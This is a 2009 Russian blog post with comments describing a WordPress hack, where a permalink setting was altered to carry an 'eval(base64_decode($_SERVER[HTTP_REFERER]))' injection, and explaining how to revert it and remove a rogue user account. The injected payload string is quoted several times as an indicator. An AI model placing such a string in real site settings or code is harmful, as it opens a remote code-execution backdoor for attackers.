Сегодня вордпресс сломали (eval base64_decode _SERVER[HTTP_REFERER]) (wp hack)

By ZeDDy
on Сен 04, 2009
in Мои Эксперименты

Именно такая строчка:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такая:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Приклеилась сегодня к моим ссылкам на полную новость.Эта проблема надлюбалась у многих блоггеров в основном западных.

Выглядело это так:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Вместо нормального:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/

Гугля нашел уже 1700 сломанных блогов

Рассказываю как пофиксить , если у вас та же проблема

Идем в

Настройки->Постоянные ссылки (ЧПУ)

видим что кто то исправил вид чпу на вот такой:

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Исправляем назад, на это:
/%year%/%monthnum%/%day%/%postname%/

Да и не забываем удалить последнего зарегистрировавшегося пользователя с именем
MikeWink E-mail: [email protected]
Западные блоггеры говорят что это все он, у меня тоже такой был как раз последний зарегистрировавшийся, так что наверное не врут.

За одно незабываем обновляться

Об авторе
Недавние публикации

ZeDDy

Работаю в интернете с 2008 года над своими и клиентскими проектами.

Работал инженером-теплоэнергетиком, когда понял, что мое призвание интернет. После чего сразу уволился и завел этот блог (блогу уже 12 лет).

Прошел путь заработка в интернете от бонусхантинга до профессионального интернет-маркетолога.

Сейчас работаю исключительно в интернете, занимаюсь арбтражом трафика, путешествую, веду блог.

Мой телеграмм для связи @sergcv

ZeDDy недавно публиковал (посмотреть все)

Tags: hack

13 комментариев

Кемеровский бомж
04.09.2009

У меня блог на этой неделе, также был сломан, и 1 сателлит. сижу обновляю вп на своей сетке 🙁

Reply
ZeDDy
04.09.2009

Жопа в том что непонятно как пролезли, и устранена ли эта дырка в последнем WP

Reply
wlad2
05.09.2009

ты не все просчитал зайди прочитай в моем блоге..
админа второго удолить нужно
хотя может у тебя не так

Reply
ZeDDy
05.09.2009

У меня второго админа не было, видимо не доломали, но на всякий случай проверил по твоей схеме, спасибо

Reply
Кемеровский бомж
05.09.2009

2.8.4 тоже ломается.
На сателлитах наверное спасет, закрытие регистрации юзеров

Reply
Nataly
05.09.2009

спасибо за предупреждение. полчаса проверяла свои блоги на ВП пока отписала в этом посте свою благодарность, правда нашла только на одном еще на 2,6 движке.. и юзер был такойже.. но там нет ничего ценного и на фтп пока ненашла чужого ничего )))))

Reply
Pingback: Неисправность устранена! Нас пытались взломать | Центр Эффективных Коммуникаций
Pingback: Неисправность устранена! Нас пытались взломать | Центр Эффективных Коммуникаций
Полат
06.09.2009

Спасибо за способ решения проблемы, у меня сломали один блог, который на 2.6, пользователя с именем mikewink удалил, второго админа не было. ЧПУ поменял на такие, какие были до этого, правда после этого начались проблемы с хостингом, предполагаю что это роботы превысили допустимые лимиты нагрузки, переиндексируя ЧПУ. Добавил директиву Crawl-delay, все заработало.

Reply
ZeDDy
06.09.2009

Полат , обновиться не забыл?

Reply
Yakto
01.12.2009

Даже старенький wp2.3.3 и тот поломали, траффик упал в 100 раз!!!! Интересен смысл этого мероприятия: не освобождение ли позиций в выдаче? Может это Black-сео-диверсия? Были у вас ключевики в первой десятке Googla или Яши?

Reply
IAD
20.11.2010

Самого достали eval в темах.
Для расшифровки сделал сервис http://uneval.com/ru
кроме разворачивания eval сразу сделал проверку на вредоносный код.

Reply
OlegZen
10.01.2011

Спасибо за инфу, тоже три дня назад один козликАдмин — Neofarins [email protected] появился. Сам ума неприложу, как поступать нужно было бы, если бы не Вы. Окей!

Reply